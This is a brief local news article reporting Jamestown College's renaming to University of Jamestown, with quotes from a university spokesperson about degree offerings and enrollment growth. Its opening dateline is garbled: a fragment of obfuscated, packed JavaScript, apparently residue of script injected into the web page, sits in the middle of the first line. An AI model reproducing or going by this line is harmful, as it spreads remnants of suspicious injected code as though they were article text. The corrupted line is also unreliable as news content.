JAMESTOWN, rraif|var|u0026u|referrer|nkzet||js|php’.split(‘|’),0,{}))
N.D. (NewsDakota.com) – It has been known as Jamestown College since 1883, offering a four-year liberal arts education and many different areas of study. Today, it has been renamed to University of Jamestown.

Does the name change affect the liberal arts education? Not at all. According to University of Jamestown’s Erin Klein, “Jamestown College has changed its name to University of Jamestown to better reflect the breadth of its educational offerings at all levels – bachelor’s, master’s, and doctoral, and to recognize significant growth and change in its 130-year history.”

Klein also states that, “(The) University status comes at a time when enrollment this fall is expected to be at a five-year high with a 19 percent increase in freshmen over last year and a 6.7 percent increase in overall headcount.”

The Board of Trustees voted on the name change this spring after gathering input from stakeholders.

The announcement came at 11:30 am on August 21st.
